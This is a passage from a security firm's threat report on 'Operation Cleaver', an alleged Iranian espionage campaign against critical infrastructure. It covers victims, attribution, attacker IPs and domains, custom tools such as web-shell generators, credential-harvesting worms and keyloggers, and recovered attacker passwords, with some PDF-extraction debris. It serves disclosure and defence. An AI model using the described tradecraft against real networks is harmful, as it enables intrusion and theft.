96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 TABLE OF CONTENTS Executive Summary ......................................................................... Background ........................................................................................ Why the name \xe2\x80\x9cCleaver\xe2\x80\x9d? ............................................................. Why Expose Iran Now? .................................................................. Critical Discoveries ......................................................................... Targets & Victims ............................................................................ Attribution ......................................................................................... Attacker IP Addresses .............................................................. Attacker Domains ...................................................................... Tools & Software ........................................................................ Tarh Andishan ............................................................................ Members ...................................................................................... Teams ............................................................................................ Tactics, Techniques & Procedures (TTPs) ............................... Initial Compromise ..................................................................... Privilege Escalation & Pivoting ............................................... Exfiltration .................................................................................... Persistence .................................................................................. Mitigation .......................................................................................... Speculation: The Why ................................................................... Conclusion ........................................................................................ References ........................................................................................ About Cylance ................................................................................. Cylance Products ........................................................................... Cylance Services ............................................................................ Acknowledgments ...................................................................... The Operation Cleaver Logo ...................................................... Appendix A: Indicators of Compromise (IOC) ........................ 5 6 8 8 9 12 17 18 19 20 24 26 30 31 32 36 41 47 60 62 65 67 68 69 70 71 72 73 #OPCLEAVER 5 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 EXECUTIVE SUMMARY Since at least 2012, Iranian actors have directly attacked, established persistence in, and extracted highly sensitive materials from the networks of government agencies and major critical infrastructure companies in the following countries: Canada, China, England, France, Germany, India, Israel, Kuwait, Mexico, Pakistan, Qatar, Saudi Arabia, South Korea, Turkey, United Arab Emirates, and the United States. Iran is the new China. Operation Cleaver has, over the past several years, conducted a significant global surveillance and infiltration campaign. To date it has successfully evaded detection by existing security technologies. The group is believed to work from Tehran, Iran, although auxiliary team members were identified in other locations including the Netherlands, Canada, and the UK. The group successfully leveraged both publicly available, and customized tools to attack and compromise targets around the globe. The targets include military, oil and gas, energy and utilities, transportation, airlines, airports, hospitals, telecommunications, technology, education, aerospace, Defense Industrial Base (DIB), chemical companies, and governments. During intense intelligence gathering over the last 24 months, we observed the technical capabilities of the Operation Cleaver team rapidly evolve faster than any previously observed Iranian effort. As Iran\xe2\x80\x99s cyber warfare capabilities continue to morph,2 the probability of an attack that could impact the physical world at a national or global level is rapidly increasing.3 Their capabilities have advanced beyond simple website defacements, Distributed Denial of Service (DDoS) attacks, and Hacking Exposed style techniques. With minimal separation between private companies and the Iranian government, their modus operandi seems clear: blur the line between legitimate engineering companies and state- sponsored cyber hacking teams to establish a foothold in the world\xe2\x80\x99s critical infrastructure. Iran\xe2\x80\x99s rising expertise, along with their choice of victims, has compelled us to release this report sooner than we would have liked in order to expose Operation Cleaver to the world. The evidence and indicators of compromise we provide in this report will allow potentially unaware victims to detect and eliminate Cleaver\xe2\x80\x99s incursions into their networks. OPERATION CLEAVER 6 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 BACKGROUND Iran has been severely impacted by debilitating and extremely advanced malware campaigns since at least 2009. Famous examples of these efforts include industrial sabotage via Stuxnet (2009 - 2010), and espionage with Duqu (2009 - 2011) as well as Flame (2012). These campaigns have targeted Iran\xe2\x80\x99s nuclear program, and oil and gas operations. Stuxnet was an eye-opening event for Iranian authorities, exposing them to the world of physical destruction via electronic means. Hacking campaigns sourced out of Iran are nothing new. Since the early 2000\xe2\x80\x99s, the information security industry as a whole has tracked teams like the Iranian Cyber Army, which mainly focuses on patriotic hacking (website defacements). After the release of Stuxnet, Iran\xe2\x80\x99s motivations appear to have shifted. Retaliation for Stuxnet began almost immediately in 2011 with campaigns like the certificate compromises of Comodo and DigiNotar. These attacks served as a warning, showcasing the rapid evolution of Iran\xe2\x80\x99s hacking skills. A major retaliation came in the form of 2012\xe2\x80\x99s Shamoon campaign, which impacted RasGas and Saudi Aramco. It\xe2\x80\x99s estimated that Shamoon impacted over 30,000 computer endpoints and cost the affected companies tens-of-thousands of hours recovering from the attacks. The direct financial impact from this retaliation and amount of downtime experienced were staggering. Shamoon was truly a watershed event for security defenders. It was the first glimpse into the real capabillity and intention of Iranian cyber operations. We see the same motivation and intent here in Operation Cleaver: establishing a beachhead for cyber sabotage. We saw further Iranian backlash in late 2012 and early 2013 in the form of Operation Ababil\xe2\x80\x99s Distributed Denial of Service (DDoS) attacks against US banks. These attacks were debilitating and impacted the availability of online banking services. Yet more backlash was witnessed with FireEye\xe2\x80\x99s exposure of Operation Saffron Rose, an espionage campaign executed by the Ajax Security Team in 2014. In May 2014, evidence emerged of a highly targeted waterhole attack that leveraged social media, dubbed Operation Newscaster, which was uncovered by iSight Partners. In June 2013, Israeli Prime Minister Benjamin Netanyahu accused Iran of carrying out \xe2\x80\x9cnon-stop\xe2\x80\x9d attacks on \xe2\x80\x9c[Israel\xe2\x80\x99s] vital national systems\xe2\x80\x9d including \xe2\x80\x9cwater, power and banking\xe2\x80\x9d4. The following September of 2013, the Wall Street Journal accused Iran of hacking into unclassified U.S. Navy computers in San Diego\xe2\x80\x99s NMCI (Navy Marine Corp Intranet),5 which we can confirm was part of Operation Cleaver. #OPCLEAVER 7 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 Figure 1: The sequence of major Iran-centric attacks; either as victims (left) or attackers (right). While previously reported operations attributed to Iran have largely focused on Defense Industrial Base (DIB) companies, the United States Federal Government, or targets in Middle Eastern countries, Operation Cleaver has instead focused on a wide array of targets, including energy producers and utilities, commercial airlines and airports, military intelligence, aerospace, hospitals, and even universities \xe2\x80\x93 with only ten of the targets based in the United States. Such broad targeting demonstrates to the world that Iran is no longer content to retaliate against the US and Israel alone. They have bigger intentions: to position themselves to impact critical infrastructure globally. S H A M N duqu~ Ababil OPERATION NEWSCASTER Saffr n Rose FL ME 2010 DigiNotar S t U X N E t 2011 2012 2013 NMCI NAVY MARINE CORPS INTRANET MMCMMM IM IN CCNMCINMCMMCIIICCCMMM 2014 ORIGINATION RETALIATION GAUSS 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 OPERATION CLEAVER 8 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 WHY THE NAME CLEAVER? The string cleaver is found several times in a variety of custom software used in Operation Cleaver, including: Numerous references inside the namespaces of their custom bot code codenamed TinyZBot, e.g.: e:\\projects\\cleaver\\trunk\\zhoupin_cleaver\\obj\\x86\\release\\netscp.pdb PDBs associated with the hacker name \xe2\x80\x9cJimbp\xe2\x80\x9d, e.g.: sers\\jimbp\\desktop\\binder_1 - for cleaver\\binder_1\\obj\\x86\\release\\setup.pdb PDBs associated with the keystroke loggers, artifacts, and numerous other tools, e.g.: e:\\Projects\\Cleaver\\trunk\\MainModule\\obj\\Release\\MainModule.pdb WHY EXPOSE IRAN NOW? We believe our visibility into this campaign represents only a fraction of Operation Cleaver\xe2\x80\x99s full scope. We believe that if the operation is left to continue unabated, it is only a matter of time before the world\xe2\x80\x99s physical safety is impacted by it. While the disclosure of this information will be a detriment to our ability to track the activity of this group, it will allow the security industry as a whole to defend against this threat. As such, we are exposing this cyber campaign early in an attempt to minimize additional real-world impact and prevent further victimization. 1 2 3 #OPCLEAVER CRITICAL DISCOVERIES 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 OPERATION CLEAVER 10 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 CRITICAL DISCOVERIES Iranian Actors Are Behind Operation Cleaver \xe2\x80\xa2 Persian hacker names are used throughout the campaign including: Salman Ghazikhani, Bahman Mohebbi, Kaj, Parviz, Alireza, and numerous others. \xe2\x80\xa2 Numerous domains used in the campaign were registered in Iran. \xe2\x80\xa2 Infrastructure leveraged in the attack was registered in Iran to the corporate entity Tarh Andishan, which translates to \xe2\x80\x9cinvention\xe2\x80\x9d or \xe2\x80\x9cinnovation\xe2\x80\x9d in Farsi. \xe2\x80\xa2 Source netblocks and ASNs are registered to Iran. \xe2\x80\xa2 Hacker tools warn when their external IP address traces back to Iran. \xe2\x80\xa2 The infrastructure is hosted through Netafraz.com, an Iranian provider out of Isfahan, Iran. \xe2\x80\xa2 The infrastructure utilized in the campaign is too significant to be a lone individual or a small group. We believe this work was sponsored by Iran. Operation Cleaver Targets Critical Infrastructure Around the World \xe2\x80\xa2 US Military targets including NMCI in October 2013.5 Confirmed targeting of global government entities. \xe2\x80\xa2 Networks and systems targeted in critical industries like energy and utilities, oil and gas, and chemical companies. \xe2\x80\xa2 Assets (both cyber and physical) and logistics information were compromised at major airline operators, airports, and transportation companies. \xe2\x80\xa2 Various global telecommunications, technology, healthcare, aerospace, and defense companies were breached as part of the operation. \xe2\x80\xa2 Confidential critical infrastructure documents were harvested from major educational institutions around the world. Iran\xe2\x80\x99s Cyber Hacking Skills Have Evolved \xe2\x80\xa2 Initial compromise techniques include SQL injection, web attacks, and creative deception- based attacks \xe2\x80\x93 all of which have been implemented in the past by Chinese and Russian hacking teams. \xe2\x80\xa2 Pivoting and exploitation techniques leveraged existing public exploits for MS08-067 and Windows privilege escalations, and were coupled with automated, worm-like propagation mechanisms. \xe2\x80\xa2 Customized private tools with functions that include ARP poisoning, encryption, credential dumping, ASP.NET shells, web backdoors, process enumeration, WMI querying, HTTP and SMB communications, network interface sniffing, and keystroke logging. \xe2\x80\xa2 The ability to build customized tools to compromise any target they choose. #OPCLEAVER 11 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 Indicators of Compromise (IOC) \xe2\x80\xa2 Private signing certificates of one victim were captured allowing the Operation Cleaver team to compromise the entirety of their organization. \xe2\x80\xa2 Over the past two years, Cylance has collected over 8GB of data including over 80,000 files of exfiltrated data, hacker tools, victim logs, and highly sensitive reconnaissance data. \xe2\x80\xa2 Data from sinkholed command and control servers has allowed us to track this active campaign. \xe2\x80\xa2 Cylance is releasing more than 150 IOCs and samples associated with the Cleaver campaign to empower the security community to detect existing compromises in their own organizations, as well as potentially block future attacks from these teams. Speculation \xe2\x80\xa2 This campaign continues Iran\xe2\x80\x99s retaliation for Stuxnet, Duqu, and Flame. \xe2\x80\xa2 This is a state-sponsored campaign. \xe2\x80\xa2 There is a possibility that this campaign could affect airline passenger safety. \xe2\x80\xa2 This campaign\xe2\x80\x99s intentions may be to damage Industrial Control Systems (ICS), Supervisory Control and Data Acquisition (SCADA) systems, and impact Critical Infrastructure and Key Resources (CIKR). \xe2\x80\xa2 This campaign could be a way to demonstrate Iran\xe2\x80\x99s cyber capabilities for additional geopolitical leverage, due to the breadth and depth of their global targets. \xe2\x80\xa2 There is an intense focus on CIKR companies in South Korea, which could give Iran additional clout in their burgeoning partnership with North Korea. In September 2012, Iran signed an extensive agreement for technology cooperation agreement with North Korea, which would allow for collaboration on various efforts including IT and security.6 \xe2\x80\xa2 Iran is recruiting from within the universities and potentially using \xe2\x80\x98hackers for hire\xe2\x80\x99.7 #OPCLEAVER TARGETS & VICTIMS 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 #OPCLEAVER 13 TARGETS & VICTIMS The Cleaver team targets some of the most sensitive global critical infrastructure companies in the world, including military, oil and gas, airlines, airports, energy producers, utilities, transportation, healthcare, telecommunications, technology, manufacturing, education, aerospace, Defense Industrial Base (DIB), chemical companies and governments. Countries impacted include Canada, China, England, France, Germany, India, Israel, Kuwait, Mexico, Pakistan, Qatar, Saudi Arabia, South Korea, Turkey, United Arab Emirates, and the US. The following is a breakdown by country of which industries were targeted and/or victimized: Canada - Energy & Utilities - Oil & Gas - Hospitals China - Aerospace England - Education France - Oil & Gas Germany - Telecommunications India - Education Israel - Aerospace - Education Kuwait - Oil & Gas - Telecommunications Mexico - Oil & Gas Pakistan - Airports - Hospitals - Technology - Airlines Qatar - Oil & Gas - Government - Airlines Saudi Arabia - Oil & Gas - Airports South Korea - Airports - Airlines - Education - Technology - Heavy Manufacturing Turkey - Oil & Gas United Arab Emirates - Government - Airlines United States - Airlines - Education - Chemicals - Transportation - Energy & Utilities - Military/Government - Defense Industrial Base OPERATION CLEAVER 14 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 Cleaver\xe2\x80\x99s level of access into each organization varied greatly, including completely compromised systems and networks, Active Directory domain controllers and credentials, compromised data repositories and stolen VPN credentials. Compromised systems include Microsoft Windows web servers running IIS and ColdFusion, Apache with PHP, many variants of Microsoft Windows desktops and servers, and Linux servers. Compromised network infrastructure included Cisco VPNs as well as Cisco switches and routers. Unlike Stuxnet, no exotic exploitations (such as 0-days) were observed. Within our investigation, we had no direct evidence of a successful compromise of specific Industrial Control Systems (ICS) or Supervisory Control and Data Acquisition (SCADA) networks, but Cleaver did exfiltrate extremely sensitive data from many critical infrastructure companies allowing them to directly affect the systems they run. This data could enable them, or affiliated organizations, to target and potentially sabotage ICS and SCADA environments with ease. We discovered over 50 victims in our investigation, distributed around the globe. Ten of these victims are headquartered in the US and include a major airline, a medical university, an energy company specializing in natural gas production, an automobile manufacturer, a large defense contractor, and a major military installation. The four targets in Israel and the five targets in Pakistan are comprised of education, aerospace, airports, airlines, healthcare and technology. Further victims were identified in numerous Middle Eastern countries as well as ones in Northern Europe including the UK, France, and Germany. Central America was not immune either with a large oil and gas company on the list. In fact, oil and gas was a particular focal point for the Cleaver team, going after no less than nine of these companies around the world. Universities were targeted in the US, India, Israel, and South Korea. The attackers targeted research efforts, student information, student housing, and financial aid systems. They had a penchant for pictures, passports, and any specifc identifying information. Perhaps the most bone-chilling evidence we collected in this campaign was the targeting and compromise of transportation networks and systems such as airlines and airports in South Korea, Saudi Arabia and Pakistan. The level of access seemed ubiquitous: Active Directory domains were fully compromised, along with entire Cisco Edge switches, routers, and internal networking infrastructure. Fully compromised VPN credentials meant their entire remote access infrastructure and supply chain was under the control of the Cleaver team, allowing permanent persistence under compromised credentials. They achieved complete access to airport gates and their security control systems, potentially allowing them to spoof gate credentials. They gained access to PayPal and Go Daddy credentials allowing them to make fraudulent purchases and allowed unfettered access to the victim\xe2\x80\x99s domains. We were witnessed a shocking amount of access into the deepest parts of these companies and the airports in which they operate. #OPCLEAVER 15 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 Figure 2: Geographic distribution of victims, as determined by the global headquarters of the parent company or organization breached. TARGET LOCATIONS COUNTRIES TARGETED 1. Canada - Calgary 2. Canada - Hamilton 3. China - Beijing 4. England - Oxford 5. France - Paris 6. Germany - Dusseldorf 7. Germany - Frankfurt 8. India - New Delhi (2) 9. Israel - Haifa (3) 10. Israel - Rehovot 11. Kuwait - Ahmadi 12. Kuwait - Kuwait City 25. UAE - Abu Dhabi 26. UAE - Al Garhoud 27. USA - California - Los Angeles (2) 28. USA - California - San Diego 29. USA - California - San Jose 30. USA - Michigan - Dearborn 31. USA - Texas - Houston (2) 32. USA - Texas - Fort Worth 33. USA - Texas - Southlake 34. USA - Virginia - Fairfax 35. USA - Virginia - McLean 13. Mexico - Mexico City 14. Pakistan - Karachi (2) 15. Pakistan - Lahore 16. Pakistan - Multan 17. Pakistan - Peshawar 18. Qatar - Doha (4) 19. Saudi Arabia - Dhahran 20. Saudi Arabia - Jeddah 21. South Korea - Incheon 22. South Korea - Goyang-si 23. South Korea - Seoul (7) 24. Turkey - Antalya 1 2 A 13 A A A A 4 6 7 5 B B B B B B B 3 B 23 21 29 28 27 31 31 33 3227 35 30 26 25 18 12 20 1110 9 17 16 8 14 15 8 19 24 A B 22 34 OPERATION CLEAVER 16 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 Figure 3: Number of Cleaver victims by the level of access obtained as well as the level of critical impact potential. LE V EL O F A C C ES S LEVEL OF CRITICAL IMPACT HIGH MEDIUM LOW TE CH NO LO GY AE RO SP AC E ED UC AT IO N CH EM ICA LS HO SP ITA LS TE LE CO MM UN ICA TIO NS TR AN SP OR TA TIO N G OV ER NM EN T OI L & G AS AIR LIN ES AIR PO RT S EN ER GY & U TIL ITI ES MA NU FA CT UR ING DE FE NS E I ND US TR IA L INDUSTRIES TARGETED #OPCLEAVER ATTRIBUTION 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 OPERATION CLEAVER 18 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 ATTRIBUTION Despite today\xe2\x80\x99s trend toward attacker attribution, we believe it offers little real benefit to the day-to-day cyber defender. However, in this report we offer our observations on the sources of Operation Cleaver in order to benefit those that rely on attribution such as Law Enforcement. Operation Cleaver is believed to consist of at least 20 hackers and developers, collaborating on projects and missions to support Iranian interests. Many of the targets were predominately English-speaking and a majority of the team members were capable of reading and writing in English. We present evidence that this team is operating, at least in part, out of Iran and in the interests of Iran. The skills and behavior of the Operation Cleaver teams are consistent with, and in one case surpasses, Iran\xe2\x80\x99s cyber capabilities as we know them today. For a complete list of IPs and domains related to this campaign, please refer to the Indicators of Compromise section. ATTACKER IP ADDRESSES Over the course of multiple incident response engagements related to Operation Cleaver, we were able to identify a small set of IP addresses which were commonly used during the initial stages of an attack. The IP address 78.109.194.114 served as a source for one of the primary attackers. They were observed conducting SQL injections, controlling backdoors, as well as exfiltrating information using this address, and the address appears in multiple software configurations recovered from staging servers over a period of time. GeoIP Location: Iran Net block: 78.109.194.96 - 78.109.194.127 Owner: Tarh Andishan Email: tarh.andishan(at)yahoo.com Phone: +98-21-22496658 NIC-Handle: TAR1973-RIPE Figure 4: The logo of the Army of the Guardians of the Islamic Revolution, also known as the Islamic Revolutionary Guard Corps (IRGC). #OPCLEAVER 19 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 This IP address was also observed in multiple software configurations. This particular net block was used over an extended period of time, indicating these were under the Cleaver team\xe2\x80\x99s physical control. Additionally, prior netblocks used by the same team demonstrated to us that this wasn\xe2\x80\x99t simply a case of proxying or \xe2\x80\x9cisland hopping\xe2\x80\x9d. For more information see the Tarh Andishan section of this report. The IP address 159.253.144.209 was a source for a secondary attacker in various compromises. They were observed conducting SQL injection attacks. While this IP was this registered in the Netherlands, we believe they used Softlayer\xe2\x80\x99s Citrix demo environment to launch these attacks which is consistent with proxying or \xe2\x80\x9cisland hopping\xe2\x80\x9d. GeoIP Location: Netherlands Net block: 159.253.144.208 - 159.253.144.223 ASN: Softlayer Technologies, Inc. IP Location: Netherlands, Amsterdam with Iranian sourcing. ATTACKER DOMAINS A number of Cleaver\xe2\x80\x99s attack methods require a persistent server. In many cases, these servers were referenced by domain names. The following malicious domains are operated by this organization and are grouped by the registrant\xe2\x80\x99s email address. davejsmith200(at)outlook.com \xe2\x80\xa2 Teledyne-Jobs.com \xe2\x80\xa2 DownloadsServers.com \xe2\x80\xa2 NorthropGrumman.net \xe2\x80\xa2 MicrosoftMiddleAst.com salman.ghazikhani(at)outlook.com \xe2\x80\xa2 Doosan-Job.com btr.8624(at)yahoo.com \xe2\x80\xa2 GoogleProductUpdate.net \xe2\x80\xa2 WindowsCentralUpdate.com \xe2\x80\xa2 WindowsUpdateServer.com \xe2\x80\xa2 DriverCenterUpdate.com As is typical with malicious domains, the Whois data for most of these domains contained falsified information. We managed to obtain a large collection of the internally developed tools used by the Cleaver team, many of which were developed by its members. Due to operational security failures, these tools contain information that provided us insight into their organization and operations. azlinux73(at)gmail.com \xe2\x80\xa2 MicrosoftServerUpdate.com \xe2\x80\xa2 WindowsSecurityUpdate.com \xe2\x80\xa2 WindowsServerUpdate.com domain(at)netafraz.com \xe2\x80\xa2 EasyResumeCreatorPro.com \xe2\x80\xa2 MicrosoftWindowsResources.com msnhst(at)microsoft.com \xe2\x80\xa2 MicrosoftWindowsUpdate.net OPERATION CLEAVER 20 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 TOOLS & SOFTWARE Shell Creator 2 In the tool named Shell Creator 2, there are three main components. The creator generates an ASPX web shell using user input as well as a collection of templates. The web shell could then be installed via xp_cmdshell, or any other method which would grant the attacker write access. The web shell is accessible by the shell client directly. The shell client is a portion of Shell Creator 2 that was not designed to be run on a compromised computer. We originally located it on a staging server being utilized for multiple attacks as well as a tool for sharing data between members of the organization\xe2\x80\x99s team. The shell client, which is developed in Java and is easily decompiled, is a simple interface with a feature to protect the operator from making a critical mistake. When executed, and before any connection to an instance of the web shell is initiated, the shell client communicates with freegeoip.net in order to get the external IP address of the current user. The country of origin is then shown to the user, to inform them of what country it appears they are connecting from. The assumed purpose of this feature is to ensure that a proper proxy is in use, and the real origin of the attacker is not revealed. After decompiling the shell client, we found the following code segment controlling the display of this IP location information. This code handles the XML response from freegeoip.net, and displays the information as different colors based on different attributes. For instance, if the string \xe2\x80\x9cERROR\xe2\x80\x9d is in the response, the text is displayed with the color magenta. If the string IRAN is in the response, the text is displayed with the color red. It should be noted that no other country name contains the substring IRAN. Figure 5: Java source code showing how Shell Creator 2 distinguishes between a source IP address coming from Iran (red) versus any other country (green). #OPCLEAVER 21 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 Shell Creator 2 (cont.) Net Crawler Net Crawler is a tool developed in C# that exhibits worm-like behavior in order to gather cached credentials from any and all accessible computers on an infected network. This is done with Windows Credential Editor (WCE) and Mimikatz in combination with PsExec. Different versions of this malware contain ASCII art which names the authoring group as Zhoupin (in \xe2\x80\x9cleetspeak\xe2\x80\x9d as \xe2\x80\x9cZh0up!n\xe2\x80\x9d). For more information on Net Crawler, see the Tactics, Techniques and Procedures section. Figure 6: Shell Creator 2 alerts the user in red when the IP being used can be sourced to Iran. Figure 7: Shell Creator 2 notifies the user in green when their source IP address is not Iran. Figure 8: Net Crawler version 1.0 has ASCII art showing the use of \xe2\x80\x9cZh0up!n\xe2\x80\x9d in the campaigns tools. Figure 9: Updated ASCII art found in Net Crawler tool shows a version of \xe2\x80\x9cZh0up!n\xe2\x80\x9d shortened to simply \xe2\x80\x9cZh0\xe2\x80\x9d. OPERATION CLEAVER 22 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 TinyZBot TinyZBot is a bot written in C# and developed by the Cleaver team. It is the longest developed malware family discovered by this group, and has been used in campaigns for close to two years. How it operates can vary greatly from version to version. For a detailed technical analysis of TinyZBot, see the Tactics, Techniques and Procedures section. As TinyZBot is developed in C#, many versions can be decompiled to code very similar to their originals, including names of namespaces. Many versions were obfuscated with a legitimate tool for developers named SmartAssembly, which makes the recovery of some names implausible. We obtained multiple versions from which we were able to recover many of the original names of variables and namespaces. In a number of these samples, the primary namespace for TinyZBot is named Zhoupin_Cleaver. In every version of TinyZBot that is not obfuscated, there is a code base referred to as Cleaver. This code base is also shared in other malware developed by this organization, such as Csext. PrivEsc PrivEsc is a blatant plagiarism of an existing exploit for Microsoft Windows released in January 2010 called MS10-015, \xe2\x80\x9cVulnerabilities in Windows Kernel Could Allow Escalation of Privilege\xe2\x80\x9d, popularly known as the KiTrap0D exploit which was released publicly. The Cleaver team clearly modified the source code and compiled a new version. The only detectable modification was to change the original author\xe2\x80\x99s name to instead display the following: Zhopin Exploit Team This is not the only case of this team relabeling others\xe2\x80\x99 work as their own. Logger Module Logger module is a component of the PVZ (PVZ is shorthand for Parviz, one of the members of the Cleaver team) bot tool chain. When executed, it will capture the user\xe2\x80\x99s keystrokes and save them to a location which PVZ bot then exfiltrates. The logger module binary\xe2\x80\x99s file description value is the following: ye file khube DG. ba in ham kari nadashte bashin Roughly translated from Persian, this text says: DG is a good file, don\xe2\x80\x99t bother with this #OPCLEAVER 23 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 Logger Module (cont.) This text could potentially be a note intended to stay internal, or could be an attempt to persuade an unsuspecting victim to assume the file is not malicious. The Product Name value is GOOD FILE. For more information on the PVZ bot tool chain, see the Tactics, Techniques, and Procedures section. CCProxy CCProxy is a publicly available proxy server for Windows, which can handle a variety of protocols. We do not believe that this organization was involved in the development or modification of CCProxy, but they have been observed using it. We recovered a CCProxy configuration, which exposed various operational details. The configuration allowed for remote connections, limited by a username as well as a limited IP range. The username was User-001, which is the default value. The limited IP range covered one IP: 78.109.194.114. This IP address is located in Iran, and is owned by Tarh Andishan. The configuration also indicates which address the CCProxy server should listen on for incoming connections such as web (80) and mail (25). Figure 10 (above): CCProxy configuration file using the hardcoded IP address registered to Tarh Andishan. Figure 11 (left): CCProxy configuration file showing the use of web and mail as listening ports. OPERATION CLEAVER 24 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 NMAP Log Log output from the network port scanning application NMAP was recovered from a staging server. This log was generated during the usage of the nbrute utility, which brute-forces network credentials and relies on NMAP to do so. The header of this NMAP log indicates that the computer used to run nbrute/nmap was set to Iran Daylight Time at the time of execution. Starting Nmap 6.25 at 2012-08-17 09:18 Iran Daylight Time With no known victims located in Iran, it is likely that this was executed on an attacker\xe2\x80\x99s computer, and not on a victim\xe2\x80\x99s computer. Squid Configuration A configuration file for a Squid proxy server was recovered. The net range of 78.109.194.114/28 was inserted into the allowed local networks with an RFC comment appended in order to make it look like it was part of the default configuration. It is likely this is the same reason a /28 net range was used, in order to not look like it was intended to only allow one IP. This would give the same access to resources accessible from the Squid proxy server to this Iranian IP address. TARH ANDISHAN Tarh Andishan is listed as the registrant for a number of small net blocks based upon the email address tarh.andishan(at)yahoo.com. The net blocks appear to rotate over time and registrant information is altered to accommodate ongoing operations and avoid potential public exposure. Figure 12: Squid configuration file showing the use of Tarh Andishan\xe2\x80\x99s IP address. #OPCLEAVER 25 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 TARH ANDISHAN (cont.) The networks are included below as well as the last time that net block was observed as active. \xe2\x80\xa2 78.109.194.96/27 - Current \xe2\x80\xa2 217.11.17.96/28 - 10/22/2014 \xe2\x80\xa2 81.90.144.104/29 - 10/5/2014 \xe2\x80\xa2 31.47.35.0/24 \xe2\x80\x93 11/2012 There are many seemingly legitimate Tarh Andishan related companies inside Tehran, but strong connections to Iranian backing have been difficult to prove definitively. \xe2\x80\x9cTarh Andishan\xe2\x80\x9d is often translated as \xe2\x80\x9cThinkers\xe2\x80\x9d, \xe2\x80\x9cInnovators\xe2\x80\x9d and \xe2\x80\x9cInventors\xe2\x80\x9d. The net blocks above have strong associations with state-owned oil and gas companies. These companies have current and former employees who are ICS experts. Tarh Andishan has been suspected in the past of launching attacks in the interest of Iran. The operators of the blog IranRedLine.org, which comments on Iran\xe2\x80\x99s nuclear weapons efforts, has mentioned in multiple posts having been the target of debilitating brute-force authentication attacks from IP addresses registered to the same Tarh Andishan team found in Cleaver. In one of IranRedLine.org\xe2\x80\x99s blog posts8, the author speculates on Tarh Andishan\xe2\x80\x99s involvement with the Iranian government by showing close proximity to SPND, the Organization of Defensive Innovation and Research; however, the phone number listed under the registrant contact information has yet to be completely validated. Figure 13: This image from IranRedLine.org demonstrates Tarh Andishan\xe2\x80\x99s probably fabricated Whois address to the proximity to Iran\xe2\x80\x99s SPND (Organization of Defensive Innovation and Research). OPERATION CLEAVER 26 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 MEMBERS During this investigation, we were able to compile a considerable amount of information on some of the members of this organization. The following profiles were built from reverse engineering, code analysis, open source intelligence, incident response and forensics work. Personally identifiable information about these members is not being shared publicly as it could endanger their lives and would be irresponsible. Parviz Parviz is a developer who worked on a variety of projects, and was primarily active in 2013. His development skillset is based around his ability to develop in C/C++. He has been observed using Visual Studio 2010, and his tools are written exclusively for Windows. Some of his tools were found to be packed with ASPack. Parviz is the primary developer of the PVZ bot and multiple parts of its tool chain. Parviz is likely associated with the PVZ bot as his name in hardcoded into the PDB file paths. The PVZ tool chain includes a variety of functionality, such as HTTP command and control communications with an ASPX server-side component, a denial of service tool they developed, and the public project named XYNTService used to run ordinary applications as services. PDBs \xe2\x80\xa2 C:\\Users\\parviz\\documents\\visual studio 2010\\Projects\\BotManager\\ Release\\BotManager.pdb \xe2\x80\xa2 C:\\Users\\parviz\\Documents\\Visual Studio 2010\\Projects\\socket-test\\ Release\\socket-test.pdb \xe2\x80\xa2 C:\\Users\\parviz\\Documents\\Visual Studio 2010\\Projects\\ XYNTServiceProject\\XYNTServiceProject\\Debug\\XYNTService.pdb \xe2\x80\xa2 C:\\Users\\Parviz\\documents\\visual studio 2010\\Projects\\SendModule\\ Release\\SendModule.pdb #OPCLEAVER 27 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 Nesha Nesha is one of the offensive members of this organization. Nesha was seen in breaches involving SQL injection as well as other techniques. Nesha often utilized web-based backdoors developed in ASPX, PHP as well as ColdFusion. A copy of an MS08-067 exploit developed in Python was recovered in which Nesha shamelessly replaced the original author\xe2\x80\x99s name with his own. Nesha\xe2\x80\x99s passwords very commonly include own handle. His passwords were frequently stored as hashes in backdoors, but common hash cracking methods were able to recover the plaintext versions. His observed password use is as follows: \xe2\x80\xa2 nesha nesha used as password in ColdFusion backdoors \xe2\x80\xa2 NeshaNesha12 used as password in ASPX backdoors. \xe2\x80\xa2 nesha123 was found as a password in a recovered credential file with unknown association Cylance observed Nesha participating in compromises involving the following techniques: \xe2\x80\xa2 SQL injection \xe2\x80\xa2 Web backdoors \xe2\x80\xa2 Cached credential dumping Nesha has additionally been identified using a variety of internally developed tools as well as the following publicly available tools: \xe2\x80\xa2 Cain & Abel \xe2\x80\xa2 PsExec \xe2\x80\xa2 PLink \xe2\x80\xa2 NetCat Alireza Alireza appears to be one of the senior developers of this organization. His tools are commonly developed in C++, Java, and C# (desktop and ASPX). These tools are often support tools, either monitoring the activity of other tools or supplementing the function of other tools gathering information during the infiltration process. Alireza\xe2\x80\x99s code appears to be reused internally on projects such as TinyZBot. Alireza appears to be using a version control system for his code, and it is likely that others are using the same system. Based on the paths, the version control system in use is likely Apache\xe2\x80\x99s Subversion. Use of 